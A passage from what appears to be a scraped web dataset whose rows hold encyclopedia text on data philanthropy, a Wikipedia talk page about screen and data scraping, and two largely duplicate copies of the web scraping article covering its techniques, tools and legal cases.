of data philanthropy is to create a global data commons where companies, governments, and individuals can contribute anonymous, aggregated datasets. 2 The United Nations Global Pulse offers four different tactics that companies can use to share their data that preserve consumer anonymity. These include: 1 By providing these four tactics, United Nations Global Pulse hopes to provide initiative and options for companies to share their data with the public. By using data gathered from social media, cell phones, and other communication modes, health researchers have been able to track the spread of diseases. 5 In the United States, HealthMap, is using data philanthropy related tactics to track the outbreak of diseases. HealthMap analyses data from publicly available media sources such as news websites, government alerts, and social media sites like X (formerly known as Twitter) for outbreaks of various illnesses around the world. 5 6 Another website, Flu Near You, allows users to report their own health status on a weekly basis. Traditional flu surveillance can take up to 2 weeks to confirm outbreaks. 5 Doctors must wait for a virological test to confirm the outbreak before reporting it to the Centers for Disease Control. This form of data philanthropy allows for up to date information regarding various health concerns by using publicly available information gathered from news outlets, government alerts, and social media sites. It is the data gathered on social media sites, where users are not aware of their data being mined that leads to HealthMap and Flu Near You being considered data philanthropy. 5 The Centers for Disease Control and Prevention collaborated with Google and launched Google Flu Trends in 2008, a website that tracks flu-related searches and user location to track the spread of the flu. Users can visit the website to compare the amount of flu-related search activity versus the reported numbers of flu outbreaks on a graphic map. The difficulty with this method of tracking is that Google searched are sometimes performed due to curiosity rather than because an individual is suffering from the flu. According to Ashley Fowlkes, an epidemiologist in the CDC Influenza division, "the Google Flu Trends system tries to account for that type of media bias by modelling search terms over time to see which ones remain stable". 5 Google Flu Trends is no longer publishing current flu estimates on the public website. Visitors to the site can still view and download previous estimates. Current data can be shared with verified researchers. 7 A study by Harvard School of Public Health (HSPH) released in the October 12, 2012 issues of the journal Science discussed how phone data helped curb the spread of malaria in Kenya. The researchers mapped phone calls and texts made by 14,816,521 Kenyan mobile phone subscribers. 8 When individuals left their primary living location the destination and length of journey was calculated. This data was then compared to a 2009 malaria prevalence map to estimate the disease's commonness in each location. Combining all this information, the researchers can estimate the probability of an individual carrying malaria and map the movement of the disease. This research can be used to track the spread of similar diseases. 8 Through data philanthropy 'big data' corporations such as social networking sites, telecommunication companies, search engines amongst others, collect and make user generated information available to a data sharing system. This also permits institutions to give back to a beneficial cause. With the onset of technological advancements, sharing data on a global scale and an in-depth analysis of these data structures could alter the reaction towards certain occurrences, be it natural disasters, epidemics, worldwide economic problems and many other events. Some analyst have argued 9 that this aggregated Information is beneficial for the common good and can lead to developments in research and data production in a range of varied fields. 9 Calling patterns of mobile phone users can determine the socioeconomic standings of the populace which can be used to deduce "its access to housing, education, healthcare, and basic services such as water and electricity". 9 Researchers from Columbia University and Karolinska Institute utilize information from mobile phone providers, in order to assist in the dispersal of resources by deducing the movement of those displaced by natural disasters. Big data can also provide information on looming disasters and can assist relief organizations in rapid response and locating displaced individuals. By analysing certain patterns within this 'big data', could successfully transform the response to destructive occurrences like natural disasters, outbreaks of diseases and global economic distress, by employing real-time information to achieve a comprehension of the welfare of individuals. Corporations utilize digital services, such as human sensor systems to detect and solve impending problems within communities. This is a strategy implemented by the private sector in order to protect its citizens by anonymously dispersing customer information to the public sector, whilst also ensuring the protection of their privacy. 9 Poverty still remains a worldwide issue with over 2.5 billion people 10 currently impoverished. Accumulating accurate data has been a complex issue but developments in technology and utilising 'big data', 10 is one solution for improving this situation. Statistics indicate the widespread use of mobile phones, even within impoverished communities. This availability could prove vital in gathering data on populations living in poverty. Additional data can be collected through Internet access, social media, utility payments and governmental statistics. Data-driven activities can lead to the cumulation of 'big data', which in turn can assist international non-governmental organization in documenting and evaluating the needs of underprivileged populations. Through data philanthropy, NGO's can distribute information whilst cooperating with governments and private companies. 10 Data philanthropy incorporates aspects of social philanthropy by permitting corporations to create profound impacts through the act of giving back by dispersing proprietary datasets. 11 The public sector, is faced with an unequal and limited access to the frequency of data and they also produce, collect and preserve information, which has proven to be an essential asset. Company's track and analyse users online activities, so as to gain more insight into their needs in relation to new products and services. 12 These companies view the welfare of the population as a vital key to the expansion and progression of businesses by using their data to places a spotlight on the plight of global citizens. 9 Experts in the private sector contend the importance of merging various data streams such as retail, mobile phone and social media data to create necessary solutions to handle global issues. Despite the inevitable risk of sharing private information, it works in a beneficial manner and serves the interest of the public. 13 The digital revolution causes an extensive production of 'big data' that is user-generated and available on the web. Corporations accumulate information on customer preferences through the digital services they utilize and products they purchase, in order to gain a clear insight on their clientele and future market opportunities. 9 However the rights of individuals concerning privacy and ownership of data are a controversial issue as governments and other institutions can use this collective data for other unethical purposes. Companies monitor and probe consumer online activities in order to better comprehend and develop tailored needs for their clientele and in turn increase their profits. 14 Data philanthropy plays an important role in academia. Researchers encounter countless obstacles whilst attempting to access data. This data is available to a limited number of researchers with sole access to restricted resources who are authorized to utilize this information; like social media streams enabling them to produce more knowledge and develop new studies. For example, Twitter markets access to its real-time APIs at exorbitant prices, which often surpasses the budgets of most researchers. 'Data grants' 14 is a trial program created by Twitter that provides a selective number of academics and researchers with access to real-time databases in order to garner further knowledge. They apply to gain entry into vast data downloads, on specific topics. 14 Data philanthropy aids the human rights movement, by assisting in the dispersal of evidence for truth commissions and war crimes tribunals. Proponents of human rights accumulate data on abuse occurring within states, which is then used for scientific analysis and propels awareness and action. For example, non-profit organizations compile data from Human Rights monitors in war zones in order to assist the UN High Commissioner for Human Rights. It uncovers inconsistencies in the number of casualties of war, which in turn leads to international attention and exerts influence on discussions relating to global policy. 14 |
126 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Talk:Data_scraping | Pappa, I noticed that you wrote about some Perl modules. Are these modules for screen scraping. If so we could include the better ones in the article. JesseHogan 01:44, 9 Dec 2004 (UTC) I dispute the notion that screen scraping is relegated to just reading HTML. I've done work on the BlackBerry (J2ME) that required screenscraping solutions... DoomBringer 02:21, 28 May 2005 (UTC) reply As a layman, I'm still confused. Are there examples that could be linked? Nick Douglas 05:24, 18 September 2005 (UTC) reply I too see Screen Scraping and Web Scraping as separate topics. I've just completed two applications that use Screen Scraping techniques to interface with a legacy system that was not web-based. —Preceding unsigned comment added by 64.90.21.3 (talk contribs) 15:55, 28 December 2006 The article was starting to collect link spam. There were several links to implementations which didn't really add information about scraping (there were just another implementation), or were outright commercial products. In order to avoid POV problems regarding external links, I have removed all external links to implementations which do not also include substantial information on how scraping works in general and how the implementation works in particular. I have also placed HTML comments in the article about this. Others can, of course, add what they want, but I've requested that people here explain their reasoning on why a link should be included. DragonHawk 13:42, 6 January 2006 (UTC) reply There was an external link that had been added to a purported example with code. But the example showed no code, just a harvested page. If you want to re-instate that link, make sure it shows the scraping code, as the link suggested. Also, log in to show your name and provide a way for this feedback to be given. peterl 11:03, 27 February 2007 (UTC) reply On 20:43, 21 January 2006, an anonymous user added a link to Box-A-Web. No edit summary was given, but the contributor included the link description "Not an article on how to do it in Ruby, but rather a technology demonstrator for drag and drop web scraping using Ruby on Rails Framework". Investigation: I visited the website in question to check it out. Adverts down the left side. Account required to use. Free registration (no fees). Guest accounts published. Tutorial explains how to use it, but little about how it works does make an analogy of XML and RSS to HTML and this tool. Text on tutorial page "as the service is free (currently ) implies it may or will become commercial in the future. Conclusion: Reverted. Contains no information on web scraping. Adds nothing to the substance of the article. Anonymous contribution makes discussion with contributor impossible. DragonHawk 01:00, 24 January 2006 (UTC) reply I just discovered that Web scraping has its own article, separate from Screen scraping. I propse merging the content from the Web scraping article into the Web scraping section of the Screen scraping article. The term "web scraping" is derrived from "screen scraping", and the two are closely related in operation, so it makes sense, to me. DragonHawk 13:57, 27 June 2006 (UTC) reply Please see my clarification in the Web scraping content. —Preceding unsigned comment added by Stefanandr (talk contribs) 16:56, 30 June 2006 Bunyip responds... This subject area is actually bigger than "Ben Hur". In a nutshell... "Screen Scraping" is a form of "Harvesting" but which is not defined in Wikipedia in the computer sense. We need to start with a description of "Harvesting" and or "Web Harvesting": "Web Harvesting" is any software technique in which a software "robot" ("webbot", "crawler" (etc)) "trawls" (ie recursively downloads a page and all the page links in it to a nominated depth) any number of possibly targetted web sites for a variety of reasons, whether legitimate or not. "Web Harvesting" can be done to index web pages for search engines, to hunt for email addresses, phone account numbers or passwords, to collect metadata, or to perform a http based archive (Eg: http: www.archive.org). We can then describe Screen Scraping somewhat thusly: When a human downloads a web page, it is called "browsing". When a computer program records an electronic copy of the textual data on a computer screen, it is called "screen scraping". A "screen scrape" is an electronic copy of the text that a human would have seen on the screen at the time, usually retaining top-bottom, left-right sequence, but it is not an image of the screen. "screen scraping" includes only expressly textual information, and exludes text appearing in image data. The computer program that performs the "screen scrape" is called a "robot". "Screen Scraping" can be used on web sites to collect the html text of the web page. "Screen Scraping" is still very common in high security mainframe-internet interfaces as a robust and inpenetrable (albeit crude) way of sending data from a secure server directly to public and insecure clients. Because the data from the server is static and mostly one way this prevents opportunities for injected code, buffer overflow conditions, or hacking attempts from rogue clients. "Screen Scraping" typically occurs multiple times on the same communication interface. We can now describe the association between the two as follows: "Web Scraping" differs from "Screen Scraping" in that the former occurs only once per web page over many different web pages. Recursively "web scraping" by following links to other pages over many web sites is "web harvesting". "web harvesting" is necessarily performed by "robots", often called "webbots", "crawlers", "harvesters" or "spiders" with similar arachnological analogies used to refer to other creepy-crawly aspects of their functions. Rightly or wrongly "web harvesters" are typically demonised as being for malicious purposes, while "webbots" are typecast as having benevolent purposes. In Australia, The Spam Act 2003 outlaws some forms of "web harvesting". 15:59, 5 September 2006 (UTC)Abunyip This definition of "screen scraping" raises questions for the "web" usage of the term. The article describes "screen scraping" on very old systems where it's done by reading a terminal's memory through an auxilliary port, and then it describes HTML parsing which has nothing whatsoever to do with screens, and calls it "screen" scraping. On the modern PC, a "screen scraping" program would have to be one that somehow reads the contents of a program's graphical window to get at the data. For example, a Web robot is not a screen scraper, but a program that somehow reads the data from an open Firefox window is. 75.186.36.20 (talk) 04:55, 9 February 2008 (UTC) reply IMHO, most of this article should be moved to the 'Data scraping' article (which is currently only a redirect), and screen scraping and web scraping mentioned as particular implementations of the former. Uker (talk) 15:07, 8 June 2009 (UTC) reply The page currently says: "These include the blocking of individual and ranges of IP addresses, which stops the majority of "cookie cutter" screen scraping applications. Added section to web scraping on stopping bots. peterl 04:41, 12 February 2007 (UTC) reply This page should point out that screen scraping is against the Terms of Use of many perhaps most commercial websites, which leads to legal liability for the scraper. Indeed, the Digital Millennium Copyright Act in the USA and European Union Copyright Directive specifically address "Circumvention of Copyright Protection Schemes", which would impact anyone scraping commercial sites whether for commercial gain or not especially when the scraped data is then redistributed. Commercial sites will aggressively protect their intellectual property, and often have little tolerance for screen scraping, especially where it impacts their commerce. As most legal force is exerted out of the public eye (and also outside of any official lawsuit) it may not be readily apparent just how vigorously commercial websites can act to protect their IP. Those considering screen scraping a commercial site should study its Terms of Use, and also consider the consequences should the site become aware that the scraping is occurring. I propose language similar to the above, adapted for entry use. Comments? Dracogen 16:55, 21 March 2007 (UTC) reply Data extraction) has been a persistent target of spammers. The commercial link was typically labeled "Know About Screen Scraping" in the See Also section. It has been removed and replaced several times. history Mrnatural (talk) 19:07, 5 August 2009 (UTC) reply Somewhat intermediate betweentrue "screen scrapers" in the modern sense, which interface with GUIs of applications, and consequently need either OCR to read the bitmapped screen directly and convert to text, or access to the underlying data objects, and HTML parsers would be something that takes already-rendered textual output from lynx and tries to figure out what it is seeing, basically tries to infer the underlying HTML to some degree. Some wiki expert, please find an appropriate place to put this topic in this wiki page, either as a new section between "2 Screen scrapers" and "3 Web scrapers, or as a sub-part of one of those two sections. IMO renaming section 2 to read "Application-UI scrapers", with sub-sections "2.1 General" "2.2 GUI scrapers" "2.3 "Standard output scrapers" would be make the most sense. Section 2.3 would include scraping any of: PTY output, or sub-process pipe stdout, or true pipe output, or Unix command-line vertical-bar piping, or TELNET output, etc. Scraping is often viewed as a way to get around web site attempts to "protect" data. I've gotten into these battles with a number of people and encourage anyone working on this to site some of these pieces or reliable refs therein, OTS needs API cygwin api comments outdated summary bio discussion on API request for SEC API These topics sometimes come up on the itext mail list as pdf authors seem to be the most prone to creating "protected" documents that are difficult to use with computers. Thanks. Nerdseeksblonde (talk) 17:26, 24 August 2009 (UTC) reply I guess I'd be thinking about reliable sources that discuss reasons why data scraping is even needed ( it sounds silly) and that would naturally lead to issues with commercial sites that are supported with ads that have no value if no one is exposed to them, to things like concern for slowing public awareness of the contents of required public filings ( everything from building permits to SEC filings could be an issue here but the SEC is at least making machine readable documents available, if not a complete automated API). I'm not sure how ever if these topics get much beyond forums and blogs. Also not entirely sure it is an encyclopedic issue. Nerdseeksblonde (talk) 23:57, 24 August 2009 (UTC) reply I merged Report mining into this article. Reyk YO 21:42, 3 April 2013 (UTC) reply Hello fellow Wikipedians, I have just modified one external link on Data scraping. Please take a moment to review my edit. If you have any questions, or need the bot to ignore the links, or the page altogether, please visit this simple FaQ for additional information. I made the following changes: When you have finished reviewing my changes, you may follow the instructions on the template below to fix any issues with the URLs. This message was posted before February 2018. After February 2018, "External links modified" talk page sections are no longer generated or monitored by InternetArchiveBot. No special action is required regarding these talk page notices, other than regular verification using the archive tool instructions below. Editors have permission to delete these "External links modified" talk page sections if they want to de-clutter talk pages, but see the RfC before doing mass systematic removals. This message is updated dynamically through the template source check (last update: 5 June 2024). Cheers.—InternetArchiveBot (Report bug) 06:28, 5 September 2017 (UTC) reply |
127 | https://en.wikipedia.org/wiki/Web_scraping | https://www.worldcat.org/issn/1086-3818 | We’re sorry, but WorldCat does not work without JavaScript enabled. Please enable JavaScript on your browser. WorldCat is the world’s largest library catalog, helping you find library materials online. |
128 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#AI-powered_document_understanding | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
129 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-23 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can 